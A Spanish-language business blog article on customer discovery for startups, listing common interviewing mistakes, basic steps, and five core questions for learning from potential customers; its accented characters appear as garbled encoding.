El descubrimiento al cliente no se trata sobre renunciar ni sobre imponer tus conceptos de otras personas, se trata sobre desafiar a tus asunciones para perfeccionar tu dise帽o. No eres ni un cobarde ni un representante de marketing eres o al menos deber铆as serlo un detective buscando pistas que te ayuden a confirmar o negar tus asunciones

Ya seas un peque帽o que comienza o un equipo interpersonal de equipos dentro de una gran empresa, tu objetivo no es compilar respuestas estad铆sticamente importantes: sino buscar patrones que te ayuden a tomar mejores decisiones.

Aquellas decisiones deben conducir a una acci贸n y esa acci贸n inteligente es lo que necesitas para el 茅xito. Existen desafortunadamente numerosos modos en los que puedes aclarar este proceso. Algunos de los m谩s comunes son:聽

  1. Tratar a la especulaci贸n como confirmaci贸n. Las preguntas tales como: 驴usar铆as esto? o 驴pagar铆as por esto? son especulativas por definici贸n. No las trates como confirmaciones de tus asunciones: desafialos en cambio a una v铆a de interacci贸n focalizada en el comportamiento, como la siguiente: 驴Disfrutas el proceso de comprar entradas online? Cu茅ntame sobre la 煤ltima vez que compraste entradas de este modo? 驴Qu茅 tan frustrado te sentiste sobre este proceso? 驴Qu茅 m茅todos o sistemas diferentes has probado?,
  2. Conducir el testigo. Los interrogatorios tales como: No creo que la mayor铆a de las personas realmente quieran reservar entradas online: 驴que piensas? No son realmente preguntas si no son conductores de respuestas. Pueden incitar a tus potenciales clientes a decir s铆 sin considerar sus sentimientos reales. Siempre realiza preguntas neutrales y con final abierto,聽
  3. Constantemente hablando. Por supuesto vas a estar excitado sobre tu producto pero el punto del descubrimiento del cliente聽 no es proclamar esto en voz alta si las otras personas est谩n excitadas como tu. Una vez m谩s: no hay nada malo con pre vender pero ten en cuenta que esto no tiene nada que ver con el aprendizaje conductivo,
  4. Escuchar solo lo que quieres escuchar. Nuestros cerebros son incre铆bles filtros. Deja tu agenda en la puerta antes de comenzar una conversaci贸n,
  5. Tratar una simple conversaci贸n como la 煤ltima verdad. Las opiniones聽 de un cliente cualquiera sean no necesitan significar nada en particular,聽
  6. Estar sobrepasado por tu temor al rechazo,
  7. Hablarle a alguien con un pulso. No todos el mundo es tu potencial cliente por lo tanto no entrevistes todo lo que se mueva,
  8. Improvisar la conversaci贸n. Mientras est谩s entrevistando a las personas es necesario mantenerlas en conversaci贸n, pero no tomes esto al extremo: debes estar preparado de ante mando y tenerte en cuenta los riesgos y asunciones en los que est茅s preocupado.聽
  9. Tratar de aprender todo en una sola reuni贸n. Si tienes una gran cantidad de preguntas realizar m谩s entrevistas y dividir las preguntas.聽
  10. Creer que solo el dise帽ador realiza la investigaci贸n cualitativa. Para mejores resultados todos en el equipo deben salir del edificio y hablar con las personas.聽
  11. Detenerse con el desarrollo del cliente despu茅s de una semana. Es necesario construir una cadencia cuantitativa regular en tu proceso del producto: es el 煤nico modo de comprender las razones de porque las cosas est谩n sucediendo o no.聽
  12. Preg煤ntele a tu cliente que dise帽e tu producto para ti. Eso no es el trabajo de tus clientes. Un buen esp铆ritu empresarial se trata de divisar soluciones y brindarlas por medio de feedback: el descubrimiento del clientes cubre este 煤ltimo.

Qu茅 Hacer: Las Bases Del Descubrimiento Del Cliente

Ahora que sabemos lo que no es el descubrimiento al cliente es mucho m谩s f谩cil describir lo que realmente es.聽

Seg煤n lo define Constable, no es nada complicado:

El descubrimiento del cliente es el proceso de ganar una visi贸n mucho m谩s profunda en tu clientes o socios o tu mercado

Sin embargo, tan simple como pueda sonar, no es solo una peque帽a dificultad de alcanzarlo es tremendamente importante hacerlo del modo justo. Y para hacerlo debes desarrollar una metodolog铆a de trabajo de alguna clase.

Despu茅s de todo, si tu objetivo es obtener las respuestas correctas es solo natural que debas:

  1. Primero dise帽ar las preguntas adecuadas,
  2. Para hacerlo debes primero comprender sus riesgos y asunciones.

Ah铆 es donde comienza todo: el descubrimiento de clientes debe ser a tu producto lo que un experimento es a una hip贸tesis cient铆fica un modo de ver si tu visi贸n se alinea con la realidad.

Por lo tanto, tan espont谩neo como se conviertan las conversaciones con tus potenciales clientes deben estar fundados en una gu铆a de entrevista cuidadosamente preparada que se dirija a tus riesgos y asunciones de manera prioritaria.聽

Luego, viene una parte fundamental:

  • Reclutar a la gente correcta para tu experimento,
  • Preguntarle a los miembros de tu familia y a tus amigos m谩s cercanos lo que piensan de tu idea es una de las estrategias m谩s comunes que las empresas iniciantes emplean y uno de los peores errores.

Tu familia y tus amigos est谩n naturalmente influenciados por ti, y preferir谩n decirte lo que quieres escuchar y no herir tus sentimientos. Por supuesto, ya que tu producto deba competir en el mundo real, tus sentimientos eventualmente te lastimar谩n solo despu茅s te costar谩n mucho dinero.聽

Reclutar a la gente correcta no es tarea f谩cil, pero teniendo en cuenta la importancia de este paso nunca debes rendirte: si no tienes 茅xito al principio se creativo e intenta algo nuevo. Y cuando finalmente los encuentres aseg煤rate de tomar nota especialmente聽respecto a tus riesgos fundamentales de manera que puedas calcular las m茅tricas despu茅s.

Establecer tus metas propuestas por encima del tiempo es incluso mejor: sabr谩s cu谩les respuestas importante y cu谩les no. Ver el comportamiento que valida la voluntad del clientes en comprar es muy 煤til.聽

El 煤ltimo paso es muy directo:

  • Una vez que juntes toda la informaci贸n, devu茅lvela a tu equipo y comienza a analizar los patrones,
  • Luego debes comenzar a modificar tu producto. Es importante recordar que no debes dejar de hacer preguntas dif铆ciles sobre tu empresa el descubrimiento del cliente no es solo un paso introductorio hacia la perfecci贸n del producto sino un proceso continuo que nunca finaliza.聽

Comenzar Con El Descubrimiento Del Cliente: Las 5 Preguntas Centrales

El descubrimiento cualitativo, es decir hablar con humanos comienza con un conjunto central de preguntas simples:

  • 驴De qui茅n quieres aprender?,
  • Si tu producto est谩 apuntado a adolescentes, 驴porqu茅 quieres hablar con sus abuelos?

Es por eso que el primer paso en tratar de aprender del mercado es tener una opini贸n de quien es realmente tu mercado.

Siempre ten en cuenta estas tres categor铆as:聽

a. Clientes t铆picos (aquellos a los que imaginas cuando aceptar谩n tu idea,

b. Los usuarios pioneros (aquellos que puedan tener la oportunidad de probar tu producto antes que los dem谩s, y

c. Los socios cr铆ticos (para la distribuci贸n, compromiso u otras partes de tu negocio);

驴Qu茅 quieres aprender?

En esencia, c贸mo tratar con tus asunciones mas importantes y m谩s riesgosas. Algunas de las preguntas m谩s importantes para ser respondidas durante el descubrimiento del cliente son:聽

a. 驴Cu谩l ser谩 tu cliente objetivo?,聽

b. 驴C贸mo har谩s dinero con tu producto?,

c. 驴C贸mo le ganar谩s a tus competidores?,

d. 驴Cu谩l es tu riesgo de ingenier铆a y tecnol贸gico m谩s grande?,

e. 驴C贸mo llegar谩s a ellos? Por supuesto pregunt谩ndole a las personas correctas. Existen tres reglas generales cuando reclutes candidatos con los que hablas:

a. Tratar de obtener un grado de separaci贸n (por lo tanto, ni madres, ni t铆os, ni mejores amigos,聽

b. S茅 creativo (no esperes a las personas que vengan a ti: encuentra modos innovadores para llegar a ellos), y

c. Pesca donde est谩 los pescados.

驴C贸mo puedes asegurar una sesi贸n efectiva?

Existen diversos modos de alcanzar esto. Algunos de ellos son:聽

a. Realiza tus entrevistas en persona.

b. Habla a una persona a la vez.

c. Trae a una persona que tome nota.

d. Atiende a cada sesi贸n preparado para escuchar cosas que quiz谩s no quieras.

e. Haz que tus entrevistados cuenten una historia, no especules.聽

f. Comprende las prioridades.

g. Busca trucos de soluci贸n

h. Escucha no hables.

驴C贸mo darle sentido a lo que aprendes?

Tu objetivo no es aprender por el hecho de aprender, sino tomar mejores decisiones que aumenten el 茅xito.

Por lo tanto, una vez que las juntas busca el sentido de las respuestas de tus potenciales clientes categorizarlas en una hoja de Excel previamente dise帽ada y busca patrones. Las m茅tricas se trata de convertir lo cualitativo en cuantitativo.聽

Notas Finales

Si quieres ser un empresario exitoso, entonces probablemente nada sea m谩s importante que manejar el descubrimiento del cliente antes de involucrarse en el proceso de venta.

Dijo el famoso Henry Ford un siglo atr谩s:

Si le hubiera preguntado a las personas lo que quer铆an, hubieran respondido caballos m谩s r谩pidos

Por lo tanto, no preguntes a las personas lo que qui茅n: preg煤ntales en cambio si les gusta tu soluci贸n a un problema que pueden incluso no saber que lo tienen.

Ese es el esp铆ritu empresarial.

Por qu茅 es importante el servicio al cliente: 10 razones para priorizarlo

Si te tomas en serio la construcci贸n de un pr贸spero negocio de comercio electr贸nico, tendr谩s que dedicar tiempo y atenci贸n al servicio al cliente.

La publicaci贸n Por qu茅 el servicio al cliente es importante: 10 razones para priorizarlo apareci贸 primero en Groove Blog.

Continue reading

El mejor software de soporte t茅cnico de 2022: c贸mo elegir + muchas opciones

Si est谩 leyendo este art铆culo, probablemente se est茅 preguntando qu茅 software de mesa de ayuda es el adecuado para usted. Proporcionamos un criterio para elegir el software de la mesa de ayuda, as铆 como 7 de nuestras mejores opciones.

La publicaci贸n El mejor software de soporte t茅cnico de 2022: c贸mo elegir + muchas opciones apareci贸 por primera vez en Groove Blog.

Continue reading